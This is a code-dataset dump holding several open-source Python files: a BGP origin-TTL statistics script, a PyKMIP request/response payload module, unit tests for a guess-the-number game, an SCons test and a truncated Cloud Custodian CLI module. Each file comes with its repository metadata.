text
stringlengths 4
1.02M
| meta
dict |
---|---|
from __future__ import print_function
import argparse
import gzip
import os
import re
import sys
import json
import psycopg2
from time import sleep
from pymongo import MongoClient
from datetime import datetime, timedelta
from collections import OrderedDict
from multiprocessing import Process, Queue, cpu_count, current_process
verbose = False
warning = False
logging = False
def print_log(*objs):
if logging or verbose:
print("[LOGS] .", *objs, file=sys.stdout)
def print_info(*objs):
if verbose:
print("[INFO] ..", *objs, file=sys.stdout)
def print_warn(*objs):
if warning or verbose:
print("[WARN] ", *objs, file=sys.stderr)
def print_error(*objs):
print("[ERROR] ", *objs, file=sys.stderr)
def valid_date(s):
try:
return datetime.strptime(s, "%Y-%m-%d")
except ValueError:
msg = "Not a valid date: '{0}'.".format(s)
raise argparse.ArgumentTypeError(msg)
def origin_ttl_postgres(dbconnstr, outqeue, mints, maxts, mt, st):
print_log("CALL origin_ttl_postgres (%s,%s,%s,%s)" % (mints,maxts,mt,st))
print_info(dbconnstr)
try:
con = psycopg2.connect(dbconnstr)
except Exception, e:
print_error("origin_ttl_postgres: connecting to database")
print_error("failed with: %s" % ( e.message))
sys.exit(1)
cur = con.cursor()
query_datasets = ("SELECT id, ts FROM t_datasets WHERE ts >= '%s' "
"AND ts < '%s' AND maptype = '%s' "
"AND subtype = '%s' ORDER BY ts")
query_origins = ("SELECT p.prefix, o.asn FROM "
"(SELECT * FROM %s WHERE dataset_id = '%s') AS o "
"LEFT JOIN t_prefixes AS p ON o.prefix_id = p.id")
datasets = OrderedDict()
try:
query = query_datasets % (mints,maxts,mt,st)
cur.execute(query)
rs = cur.fetchall()
datasets = OrderedDict((row[0], row[1]) for row in rs)
except Exception, e:
print_error("QUERY: %s ; failed with: %s" % (query, e.message))
con.rollback()
print_log ("FOUND %s datasets." % str(len(datasets)))
origins = dict()
cnt = 0
for did in datasets:
cnt = cnt+1
print_info("RUN %s, processing did: %s, dts: %s" %
(cnt, did, datasets[did]))
ts_str = datasets[did]
ym_str = ts_str.strftime("%Y_%m")
table = "t_origins_"+ym_str
#ts = (datetime.strptime(ts_str, "%Y-%m-%d %H:%M:%S") -
# datetime(1970, 1, 1)).total_seconds()
ts = (ts_str - datetime(1970, 1, 1)).total_seconds()
# get origins of dataset
try:
query = query_origins % (table, did)
cur.execute(query)
rs = cur.fetchall()
except Exception, e:
print_error("QUERY: %s ; failed with: %s" % (query, e.message))
con.rollback()
else:
# update timestamps of prefix origin association
for row in rs:
pfx = str(row[0])
asn = int(row[1])
if pfx not in origins:
origins[pfx] = dict()
if asn not in origins[pfx]:
val = (ts_str,ts_str)
origins[pfx][asn] = val
else:
old = origins[pfx][asn]
val = (old[0],ts_str)
origins[pfx][asn] = val
# check prefix origin association, output and delete old ones
delorigin = list()
for pfx in origins:
for asn in origins[pfx]:
val = origins[pfx][asn]
if val[1] != ts_str:
ts0 = (val[0] - datetime(1970, 1, 1)).total_seconds()
ts1 = (val[1] - datetime(1970, 1, 1)).total_seconds()
ttl = int(ts1 - ts0)
if ttl > 0:
res = (pfx,asn,str(val[0]),str(val[1]),ttl)
outqeue.put(res)
dl = (pfx, asn)
delorigin.append(dl)
for d in delorigin:
pfx = d[0]
asn = d[1]
del origins[pfx][asn]
for pfx in origins:
for asn in origins[pfx]:
val = origins[pfx][asn]
ts0 = (val[0] - datetime(1970, 1, 1)).total_seconds()
ts1 = (val[1] - datetime(1970, 1, 1)).total_seconds()
ttl = int(ts1 - ts0)
if ttl > 0:
res = (pfx,asn,str(val[0]),str(val[1]),ttl)
outqeue.put(res)
return True
def output_thread(outqeue, opts):
print_log("CALL output_thread")
oid = 0
# init output
if opts[0] == 'json':
fout = opts[1]
f = sys.stdout
if fout and (not fout.lower().endswith('.gz')):
fout = fout+".gz"
f = gzip.open(fout, "wb")
header = ('{'
' "begin" : "%s",'
' "until" : "%s",'
' "maptype" : "%s",'
' "subtype" : "%s",'
' "origin_ttls" : [\n' % (opts[2:6]))
f.write(header)
f.flush()
elif opts[0] == 'postgres':
dbconnstr = opts[1]
try:
con = psycopg2.connect(dbconnstr)
except Exception, e:
print_error("retrieve_postgres: connecting to database")
print_error("failed with: %s" % ( e.message))
sys.exit(1)
cur = con.cursor()
insert_origin = ("INSERT INTO t_origin_ttl "
"(ts_begin, ts_until, maptype, subtype)"
" VALUES (%s, %s, %s, %s) RETURNING id")
insert_data = ("INSERT INTO t_origin_ttl_data "
"VALUES (%s,%s,%s,%s,%s,%s)")
query_prefix = "SELECT id FROM t_prefixes WHERE prefix = %s"
insert_prefix = "INSERT INTO t_prefixes (prefix) VALUES (%s) RETURNING id"
try:
cur.execute(insert_origin, [opts[2].strftime('%Y-%m-%d'),
opts[3].strftime('%Y-%m-%d'),
opts[4],opts[5]])
con.commit()
oid = cur.fetchone()[0]
except Exception, e:
print_error("INSERT t_origin_ttl failed with: %s" % (e.message))
con.rollback()
sys.exit(1)
else:
if oid == 0:
print_error("No valid origin_ttl id!")
sys.exit(1)
# get all prefixes already in database
query_all_prefixes = "SELECT prefix, id FROM t_prefixes"
prefix_ids = dict()
try:
cur.execute(query_all_prefixes)
pfx = cur.fetchall()
prefix_ids = dict((pfx[i][0], pfx[i][1]) for i in range(len(pfx)))
except Exception, e:
print_error("QUERY t_prefixes (1) failed with: %s" % (e.message))
con.rollback()
elif opts[0] == 'mongodb':
print_error("Not implemented yet! How did you even get here?!")
sys.exit(1)
else: # csv
fout = opts[1]
f = sys.stdout
if fout and (not fout.lower().endswith('.gz')):
fout = fout+".gz"
f = gzip.open(fout, "wb")
header = ("# begin: %s\n"
"# until: %s\n"
"# maptype: %s\n"
"# subtype: %s\n"
"Prefix;ASN;ts0;ts1,ttl\n" % (opts[2:6]))
f.write(header)
f.flush()
# output queue data
first = True
while True:
odata = outqeue.get()
if (odata == 'DONE'):
print_log("EXIT output_thread")
break
if opts[0] == 'json':
if not first:
f.write(",\n")
else:
first = False
f.write(json.dumps(odata))
f.flush()
elif opts[0] == 'postgres':
pid = 0
pfx = odata[0]
if pfx in prefix_ids:
pid = prefix_ids[pfx]
else:
try:
cur.execute(insert_prefix, [pfx])
con.commit()
pid = cur.fetchone()
except Exception, e:
print_error("INSERT t_prefixes failed with: %s" % (e.message))
con.rollback()
if pid > 0:
try:
cur.execute(insert_data,
[oid,pid,odata[1],odata[2],odata[3],odata[4]])
con.commit()
except Exception, e:
print_error("INSERT t_origin_ttl failed with: %s" % (e.message))
con.rollback()
else:
print_warn("Invalid ID for prefix %s" % (pfx))
elif opts[0] == 'mongodb':
print_error("WTF? Still not implemented yet! How'd u get here?")
sys.exit(1)
else:
f.write(';'.join(str(x) for x in odata) + "\n")
f.flush()
# finalize output
if opts[0] == 'json':
footer = (' ]\n}')
f.write(footer)
if opts[1]:
f.close()
elif opts[0] == 'csv':
f.flush()
if opts[1]:
f.close()
# and done
return True
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--logging',
help='print logging.',
action='store_true')
parser.add_argument('-w', '--warning',
help='print warnings.',
action='store_true')
parser.add_argument('-v', '--verbose',
help='print everything.',
action='store_true')
imode = parser.add_mutually_exclusive_group(required=True)
imode.add_argument('-m', '--mongodb',
help='Read from MongoDB.',
type=str)
imode.add_argument('-p', '--postgres',
help='Read from PostgresqlDB.',
type=str)
omode = parser.add_mutually_exclusive_group(required=False)
omode.add_argument('-c', '--csv',
help='Output data as CSV.',
action='store_true')
omode.add_argument('-j', '--json', help='Output data as JSON.',
action='store_true')
omode.add_argument('-d', '--database',
help="Store data into database (same as input).",
action='store_true')
parser.add_argument('-f', '--file',
help='Write data to file',
default=False)
parser.add_argument('-b', '--begin',
help='Begin date (inclusive), format: yyyy-mm-dd',
type=valid_date, default="2005-01-01")
parser.add_argument('-u', '--until',
help='Until date (exclusive), format: yyyy-mm-dd',
type=valid_date, default="2005-02-01")
parser.add_argument('-t', '--type',
help='Type of data source (show all: ?).',
type=str, default="routeviews")
parser.add_argument('-s', '--subtype',
help='Subtype of data source (show all: ?)',
type=str, default="route-views.eqix")
args = vars(parser.parse_args())
# output settings
global verbose
verbose = args['verbose']
global warning
warning = args['warning']
global logging
logging = args['logging']
# run
start_time = datetime.now()
print_log("START: " + start_time.strftime('%Y-%m-%d %H:%M:%S'))
begin = args['begin']
until = args['until']
maptype = args['type']
subtype = args['subtype']
# output options, tupel: how, where, ts0, ts1, type, subtype
oopts = ('csv', args['file'], begin, until, maptype, subtype)
if args['json']:
oopts = ('json', args['file'], begin, until, maptype, subtype)
elif args['database']:
if args['postgres']:
oopts = ('postgres', args['postgres'],
begin, until, maptype, subtype)
elif args['mongodb']:
oopts = ('mongodb', args['mongodb'],
begin, until, maptype, subtype)
# start output process to
output_queue = Queue()
if args['postgres']:
main_p = Process(target=origin_ttl_postgres,
args=(args['postgres'], output_queue,
begin, until, maptype, subtype))
else:
print_error('No valid data source found!')
main_p.start()
output_p = Process(target=output_thread,
args=(output_queue, oopts))
output_p.start()
main_p.join()
output_queue.put('DONE')
output_p.join()
end_time = datetime.now()
print_log("FINISH: " + end_time.strftime('%Y-%m-%d %H:%M:%S'))
done_time = end_time - start_time
print_log(" processing time [s]: " + str(done_time.total_seconds()))
if __name__ == "__main__":
main()
| {
"content_hash": "d73cfd3b31160e184c3dccfbfb18986f",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 84,
"avg_line_length": 35.86065573770492,
"alnum_prop": 0.48205714285714285,
"repo_name": "smlng/bgp-stats",
"id": "b5c6c1830844b70b480016caa8a4b6fad31da5e3",
"size": "13144",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/python/bgp-origin-ttl.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "157967"
},
{
"name": "R",
"bytes": "22409"
},
{
"name": "Shell",
"bytes": "766"
}
],
"symlink_target": ""
} |
import six
from kmip import enums
from kmip.core import primitives
from kmip.core import utils
from kmip.core.messages.payloads import base
class GetUsageAllocationRequestPayload(base.RequestPayload):
"""
A request payload for the GetUsageAllocation operation.
Attributes:
unique_identifier: The unique ID of the object for which to obtain a
usage allocation.
usage_limits_count: The number of usage limits units that should be
reserved for the object.
"""
def __init__(self, unique_identifier=None, usage_limits_count=None):
"""
Construct a GetUsageAllocation request payload struct.
Args:
unique_identifier (string): The ID of the managed object (e.g.,
a public key) to obtain a usage allocation for. Optional,
defaults to None.
usage_limits_count (int): The number of usage limits units that
should be reserved for the object. Optional, defaults to None.
"""
super(GetUsageAllocationRequestPayload, self).__init__()
self._unique_identifier = None
self._usage_limits_count = None
self.unique_identifier = unique_identifier
self.usage_limits_count = usage_limits_count
@property
def unique_identifier(self):
if self._unique_identifier:
return self._unique_identifier.value
else:
return None
@unique_identifier.setter
def unique_identifier(self, value):
if value is None:
self._unique_identifier = None
elif isinstance(value, six.string_types):
self._unique_identifier = primitives.TextString(
value=value,
tag=enums.Tags.UNIQUE_IDENTIFIER
)
else:
raise TypeError("Unique identifier must be a string.")
@property
def usage_limits_count(self):
if self._usage_limits_count:
return self._usage_limits_count.value
else:
return None
@usage_limits_count.setter
def usage_limits_count(self, value):
if value is None:
self._usage_limits_count = None
elif isinstance(value, six.integer_types):
self._usage_limits_count = primitives.LongInteger(
value=value,
tag=enums.Tags.USAGE_LIMITS_COUNT
)
else:
raise TypeError("Usage limits count must be an integer.")
def read(self, input_stream, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Read the data encoding the GetUsageAllocation request payload and
decode it into its constituent parts.
Args:
input_stream (stream): A data stream containing encoded object
data, supporting a read method; usually a BytearrayStream
object.
kmip_version (KMIPVersion): An enumeration defining the KMIP
version with which the object will be decoded. Optional,
defaults to KMIP 1.0.
Raises:
ValueError: Raised if the data attribute is missing from the
encoded payload.
"""
super(GetUsageAllocationRequestPayload, self).read(
input_stream,
kmip_version=kmip_version
)
local_stream = utils.BytearrayStream(input_stream.read(self.length))
if self.is_tag_next(enums.Tags.UNIQUE_IDENTIFIER, local_stream):
self._unique_identifier = primitives.TextString(
tag=enums.Tags.UNIQUE_IDENTIFIER
)
self._unique_identifier.read(
local_stream,
kmip_version=kmip_version
)
if self.is_tag_next(enums.Tags.USAGE_LIMITS_COUNT, local_stream):
self._usage_limits_count = primitives.LongInteger(
tag=enums.Tags.USAGE_LIMITS_COUNT
)
self._usage_limits_count.read(
local_stream,
kmip_version=kmip_version
)
self.is_oversized(local_stream)
def write(self, output_stream, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Write the data encoding the GetUsageAllocation request payload to a
stream.
Args:
output_stream (stream): A data stream in which to encode object
data, supporting a write method; usually a BytearrayStream
object.
kmip_version (KMIPVersion): An enumeration defining the KMIP
version with which the object will be encoded. Optional,
defaults to KMIP 1.0.
Raises:
ValueError: Raised if the data attribute is not defined.
"""
local_stream = utils.BytearrayStream()
if self._unique_identifier:
self._unique_identifier.write(
local_stream,
kmip_version=kmip_version
)
if self._usage_limits_count:
self._usage_limits_count.write(
local_stream,
kmip_version=kmip_version
)
self.length = local_stream.length()
super(GetUsageAllocationRequestPayload, self).write(
output_stream,
kmip_version=kmip_version
)
output_stream.write(local_stream.buffer)
def __eq__(self, other):
if isinstance(other, GetUsageAllocationRequestPayload):
if self.unique_identifier != other.unique_identifier:
return False
elif self.usage_limits_count != other.usage_limits_count:
return False
else:
return True
else:
return NotImplemented
def __ne__(self, other):
if isinstance(other, GetUsageAllocationRequestPayload):
return not (self == other)
else:
return NotImplemented
def __repr__(self):
args = ", ".join([
"unique_identifier='{0}'".format(self.unique_identifier),
"usage_limits_count={0}".format(self.usage_limits_count)
])
return "GetUsageAllocationRequestPayload({0})".format(args)
def __str__(self):
return str({
'unique_identifier': self.unique_identifier,
'usage_limits_count': self.usage_limits_count
})
class GetUsageAllocationResponsePayload(base.ResponsePayload):
"""
A response payload for the GetUsageAllocation operation.
Attributes:
unique_identifier: The unique ID of the object that was allocated.
"""
def __init__(self, unique_identifier=None):
"""
Construct a GetUsageAllocation response payload struct.
Args:
unique_identifier (string): The ID of the managed object (e.g.,
a public key) that was allocated. Optional, defaults to None.
"""
super(GetUsageAllocationResponsePayload, self).__init__()
self._unique_identifier = None
self.unique_identifier = unique_identifier
@property
def unique_identifier(self):
if self._unique_identifier:
return self._unique_identifier.value
else:
return None
@unique_identifier.setter
def unique_identifier(self, value):
if value is None:
self._unique_identifier = None
elif isinstance(value, six.string_types):
self._unique_identifier = primitives.TextString(
value=value,
tag=enums.Tags.UNIQUE_IDENTIFIER
)
else:
raise TypeError("Unique identifier must be a string.")
def read(self, input_stream, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Read the data encoding the GetUsageAllocation response payload and
decode it into its constituent parts.
Args:
input_stream (stream): A data stream containing encoded object
data, supporting a read method; usually a BytearrayStream
object.
kmip_version (KMIPVersion): An enumeration defining the KMIP
version with which the object will be decoded. Optional,
defaults to KMIP 1.0.
Raises:
ValueError: Raised if the data attribute is missing from the
encoded payload.
"""
super(GetUsageAllocationResponsePayload, self).read(
input_stream,
kmip_version=kmip_version
)
local_stream = utils.BytearrayStream(input_stream.read(self.length))
if self.is_tag_next(enums.Tags.UNIQUE_IDENTIFIER, local_stream):
self._unique_identifier = primitives.TextString(
tag=enums.Tags.UNIQUE_IDENTIFIER
)
self._unique_identifier.read(
local_stream,
kmip_version=kmip_version
)
self.is_oversized(local_stream)
def write(self, output_stream, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Write the data encoding the GetUsageAllocation response payload to a
stream.
Args:
output_stream (stream): A data stream in which to encode object
data, supporting a write method; usually a BytearrayStream
object.
kmip_version (KMIPVersion): An enumeration defining the KMIP
version with which the object will be encoded. Optional,
defaults to KMIP 1.0.
Raises:
ValueError: Raised if the data attribute is not defined.
"""
local_stream = utils.BytearrayStream()
if self._unique_identifier:
self._unique_identifier.write(
local_stream,
kmip_version=kmip_version
)
self.length = local_stream.length()
super(GetUsageAllocationResponsePayload, self).write(
output_stream,
kmip_version=kmip_version
)
output_stream.write(local_stream.buffer)
def __eq__(self, other):
if isinstance(other, GetUsageAllocationResponsePayload):
if self.unique_identifier != other.unique_identifier:
return False
else:
return True
else:
return NotImplemented
def __ne__(self, other):
if isinstance(other, GetUsageAllocationResponsePayload):
return not (self == other)
else:
return NotImplemented
def __repr__(self):
args = "unique_identifier='{0}'".format(self.unique_identifier)
return "GetUsageAllocationResponsePayload({0})".format(args)
def __str__(self):
return str({
'unique_identifier': self.unique_identifier,
})
| {
"content_hash": "5754ef3c890e8cd625b1873fbc292881",
"timestamp": "",
"source": "github",
"line_count": 313,
"max_line_length": 78,
"avg_line_length": 34.52715654952077,
"alnum_prop": 0.593689275469603,
"repo_name": "OpenKMIP/PyKMIP",
"id": "9e98f84e5eb6e120266d6245f32a5e7359466876",
"size": "11453",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kmip/core/messages/payloads/get_usage_allocation.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5552888"
},
{
"name": "Shell",
"bytes": "1214"
}
],
"symlink_target": ""
} |
"""
# @package coursera2012
# @author Rolf Hemmerling <[email protected]>
# @version 1.00
# @date 2015-01-01
# @copyright Apache License, Version 2.0
#
# Implementation of the game
# "Guess The Number"
# for the Coursera course
# "An Introduction to Interactive Programming in Python"
#
# Copyright 2012-2015 Rolf Hemmerling
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
# import modules
import random
import unittest
import random
from guessthenumber import myRandomSeed
from guessthenumber import guessTheNumber
class setGuessesTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testInitGuesses(self):
"""test case set_guesses"""
self.gTN.set_guesses(7)
assert self.gTN.set_guesses(7) == self.gTN.remaining_guesses, "set_guesses() does not provide the right number"
assert self.gTN.set_guesses(7) == 7, "set_guesses() does not provide the right number"
assert self.gTN.set_guesses(7) != 8, "set_guesses() does not provide the right number"
class rangeTest(unittest.TestCase):
const_newgame_message100 = "Please guess a number in the range [0, 100)"
const_newgame_message1000 = "Please guess a number in the range [0, 1000)"
def setUp(self):
"""Call before every test case."""
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testRange(self):
"""Test case range100, range1000. note that all test method names must begin with 'test.'"""
assert self.gTN.range100() == self.const_newgame_message100, "range100 does not provide the right string"
assert self.gTN.range1000() == self.const_newgame_message1000, "range1000 does not provide the right string"
assert self.gTN.range100() != self.const_newgame_message1000, "range100 does not provide the right string"
assert self.gTN.range1000() != self.const_newgame_message100, "range1000 does not provide the right string"
pass
class setRangeTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testSetRange(self):
"""test case set_range"""
assert self.gTN.set_range(100) == 100, "set_range() does not provide the right number"
assert self.gTN.set_range(1000) == 1000, "set_range() does not provide the right number"
assert self.gTN.set_range(100) != 1000, "set_range() does not provide the right number"
assert self.gTN.set_range(1000) != 100, "set_range() does not provide the right number"
class setSecretNumberTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testSetSecretNumber(self):
"""test case set_secret_number"""
global myRandomSeed
random.seed(myRandomSeed)
secret_number = self.gTN.set_secret_number()
assert secret_number == 23, "set_secret_number() does not provide the right number"
assert self.gTN.secret_number == 23, "set_secret_number() does not provide the right number"
class outOfRangeCheckTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testOutOfRangeCheck(self):
"""test case out_of_range_check """
assert self.gTN.out_of_range_check(99,100) == 99, "out_of_range_check() does not provide the right number"
assert self.gTN.out_of_range_check(100,100) == "Input is out of range!", "out_of_range_check() does not provide a proper return answer"
assert self.gTN.out_of_range_check(-1,100) == "Input is out of range!", "out_of_range_check() does not provide a proper return answer"
assert self.gTN.out_of_range_check(999,1000) == 999, "out_of_range_check() does not provide the right number"
assert self.gTN.out_of_range_check(1000,1000) == "Input is out of range!", "out_of_range_check() does not provide the right return answer"
assert self.gTN.out_of_range_check(-1,1000) == "Input is out of range!", "out_of_range_check() does not provide the right return answer"
class verifyInputTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testVerifyInput(self):
"""test case verify_input """
interactive_input = raw_input("Guess ( Please enter 55 ) = ")
guess = self.gTN.verify_input(interactive_input, 100)
assert guess == 55, "get_input() does not provide the right number"
class processPlayerInputTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
global myRandomSeed
random.seed(myRandomSeed)
self.gTN = guessTheNumber()
self.gTN.main()
def tearDown(self):
"""Call after every test case."""
def testProcessPlayerInput(self):
"""test case process_player_input"""
print ("das ist der Cheat = ", self.gTN.process_player_input("Cheat"))
assert self.gTN.process_player_input("Cheat") == "Secret number = 23", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(50) == "Lower!", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(25) == "Lower!", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(13) == "Higher!", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(17) == "Higher!", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(20) == "Higher!", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(22) == "Higher!", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(23) == "Correct!", "process_player_input() does not provide the right answer"
class guessTheNumberTest(unittest.TestCase):
def setUp(self):
global myRandomSeed
random.seed(myRandomSeed)
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testGuessTheNumber(self):
assert self.gTN.main() == self.gTN.secret_number, 'main() does not provide the right secret number'
# run all tests
if __name__ == "__main__":
try:
unittest.main()
except SystemExit as inst:
if inst.args[0] is True: # raised by sys.exit(True) when tests failed
raise
| {
"content_hash": "a526f61fa106f845d2b90e21148998be",
"timestamp": "",
"source": "github",
"line_count": 183,
"max_line_length": 146,
"avg_line_length": 42.42622950819672,
"alnum_prop": 0.6477331272539928,
"repo_name": "hemmerling/python-coursera2012",
"id": "67e899b282efcf05ce192d0dee9600aeed41dcba",
"size": "7812",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/week2/week2_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "316418"
}
],
"symlink_target": ""
} |
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Test how we handle a no-results test specified on the command line.
"""
import TestRuntest
pythonstring = TestRuntest.pythonstring
test = TestRuntest.TestRuntest()
test.subdir('test')
test.write_no_result_test(['test', 'no_result.py'])
expect_stdout = """\
%(pythonstring)s -tt test/no_result.py
NO RESULT TEST STDOUT
""" % locals()
expect_stderr = """\
NO RESULT TEST STDERR
"""
test.run(arguments='-b . test/no_result.py',
status=2,
stdout=expect_stdout,
stderr=expect_stderr)
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| {
"content_hash": "a4f1d74495081707b97bbbec8390540e",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 67,
"avg_line_length": 19.135135135135137,
"alnum_prop": 0.6666666666666666,
"repo_name": "azverkan/scons",
"id": "8e0d0ddb935d8b596bb2e840ba30094ddfe9bcf2",
"size": "1810",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/runtest/baseline/no_result.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "259"
},
{
"name": "JavaScript",
"bytes": "17316"
},
{
"name": "Perl",
"bytes": "45214"
},
{
"name": "Python",
"bytes": "6727715"
},
{
"name": "Shell",
"bytes": "2535"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import Counter, defaultdict
from datetime import timedelta, datetime
from functools import wraps
import inspect
import json
import logging
import os
import pprint
import sys
import time
import six
import yaml
from c7n.policy import Policy, PolicyCollection, load as policy_load
from c7n.reports import report as do_report
from c7n.utils import Bag, dumps, load_file
from c7n import provider
from c7n.resources import load_resources
from c7n import schema
log = logging.getLogger('custodian.commands')
def policy_command(f):
@wraps(f)
def _load_policies(options):
load_resources()
vars = _load_vars(options)
errors = 0
all_policies = PolicyCollection.from_data({}, options)
# for a default region for policy loading, we'll expand regions later.
options.region = options.regions[0]
for fp in options.configs:
try:
collection = policy_load(options, fp, vars=vars)
except IOError:
log.error('policy file does not exist ({})'.format(fp))
errors += 1
continue
except ValueError as e:
log.error('problem loading policy file ({})'.format(e.message))
errors += 1
continue
if collection is None:
log.debug('Loaded file {}. Contained no policies.'.format(fp))
else:
log.debug(
'Loaded file {}. Contains {} policies'.format(
fp, len(collection)))
all_policies = all_policies + collection
if errors > 0:
log.error('Found {} errors. Exiting.'.format(errors))
sys.exit(1)
# filter by name and resource type
policies = all_policies.filter(
getattr(options, 'policy_filter', None),
getattr(options, 'resource_type', None))
# expand by region, this results in a separate policy instance per region of execution.
policies = policies.expand_regions(options.regions)
if len(policies) == 0:
_print_no_policies_warning(options, all_policies)
# If we filtered out all the policies we want to exit with a
# non-zero status. But if the policy file is empty then continue
# on to the specific command to determine the exit status.
if len(all_policies) > 0:
sys.exit(1)
# Do not allow multiple policies in a region with the same name,
# even across files
policies_by_region = defaultdict(list)
for p in policies:
policies_by_region[p.options.region].append(p)
for region in policies_by_region.keys():
counts = Counter([p.name for p in policies_by_region[region]])
for policy, count in six.iteritems(counts):
if count > 1:
log.error("duplicate policy name '{}'".format(policy))
sys.exit(1)
return f(options, list(policies))
return _load_policies
def _load_vars(options):
vars = None
if options.vars:
try:
vars = load_file(options.vars)
except IOError as e:
log.error('Problem loading vars file "{}": {}'.format(options.vars, e.strerror))
sys.exit(1)
# TODO - provide builtin vars here (such as account)
return vars
def _print_no_policies_warning(options, policies):
if options.policy_filter or options.resource_type:
log.warning("Warning: no policies matched the filters provided.")
log.warning("Filters:")
if options.policy_filter:
log.warning(" Policy name filter (-p): " + options.policy_filter)
if options.resource_type:
log.warning(" Resource type filter (-t): " + options.resource_type)
log.warning("Available policies:")
for policy in policies:
log.warning(" - {} ({})".format(policy.name, policy.resource_type))
if not policies:
log.warning(" (none)")
else:
log.warning('Empty policy file(s). Nothing to do.')
def validate(options):
load_resources()
if len(options.configs) < 1:
log.error('no config files specified')
sys.exit(1)
used_policy_names = set()
schm = schema.generate()
errors = []
for config_file in options.configs:
config_file = os.path.expanduser(config_file)
if not os.path.exists(config_file):
raise ValueError("Invalid path for config %r" % config_file)
options.dryrun = True
fmt = config_file.rsplit('.', 1)[-1]
with open(config_file) as fh:
if fmt in ('yml', 'yaml'):
data = yaml.safe_load(fh.read())
elif fmt in ('json',):
data = json.load(fh)
else:
log.error("The config file must end in .json, .yml or .yaml.")
raise ValueError("The config file must end in .json, .yml or .yaml.")
errors += schema.validate(data, schm)
conf_policy_names = {
p.get('name', 'unknown') for p in data.get('policies', ())}
dupes = conf_policy_names.intersection(used_policy_names)
if len(dupes) >= 1:
errors.append(ValueError(
"Only one policy with a given name allowed, duplicates: %s" % (
", ".join(dupes)
)
))
used_policy_names = used_policy_names.union(conf_policy_names)
if not errors:
null_config = Bag(dryrun=True, log_group=None, cache=None, assume_role="na")
for p in data.get('policies', ()):
try:
policy = Policy(p, null_config, Bag())
policy.validate()
except Exception as e:
msg = "Policy: %s is invalid: %s" % (
p.get('name', 'unknown'), e)
errors.append(msg)
if not errors:
log.info("Configuration valid: {}".format(config_file))
continue
log.error("Configuration invalid: {}".format(config_file))
for e in errors:
log.error("%s" % e)
if errors:
sys.exit(1)
# This subcommand is disabled in cli.py.
# Commmeting it out for coverage purposes.
#
# @policy_command
# def access(options, policies):
# permissions = set()
# for p in policies:
# permissions.update(p.get_permissions())
# pprint.pprint(sorted(list(permissions)))
@policy_command
def run(options, policies):
exit_code = 0
for policy in policies:
try:
policy()
except Exception:
exit_code = 2
if options.debug:
raise
log.exception(
"Error while executing policy %s, continuing" % (
policy.name))
if exit_code != 0:
sys.exit(exit_code)
@policy_command
def report(options, policies):
if len(policies) == 0:
log.error('Error: must supply at least one policy')
sys.exit(1)
resources = set([p.resource_type for p in policies])
if len(resources) > 1:
log.error('Error: Report subcommand can accept multiple policies, '
'but they must all be for the same resource.')
sys.exit(1)
delta = timedelta(days=options.days)
begin_date = datetime.now() - delta
do_report(
policies, begin_date, options, sys.stdout, raw_output_fh=options.raw)
@policy_command
def logs(options, policies):
if len(policies) != 1:
log.error("Log subcommand requires exactly one policy")
sys.exit(1)
policy = policies.pop()
for e in policy.get_logs(options.start, options.end):
print("%s: %s" % (
time.strftime(
"%Y-%m-%d %H:%M:%S", time.localtime(e['timestamp'] / 1000)),
e['message']))
def _schema_get_docstring(starting_class):
""" Given a class, return its docstring.
If no docstring is present for the class, search base classes in MRO for a
docstring.
"""
for cls in inspect.getmro(starting_class):
if inspect.getdoc(cls):
return inspect.getdoc(cls)
def schema_completer(prefix):
""" For tab-completion via argcomplete, return completion options.
For the given prefix so far, return the possible options. Note that
filtering via startswith happens after this list is returned.
"""
load_resources()
components = prefix.split('.')
if components[0] in provider.clouds.keys():
cloud_provider = components.pop(0)
provider_resources = provider.resources(cloud_provider)
else:
cloud_provider = 'aws'
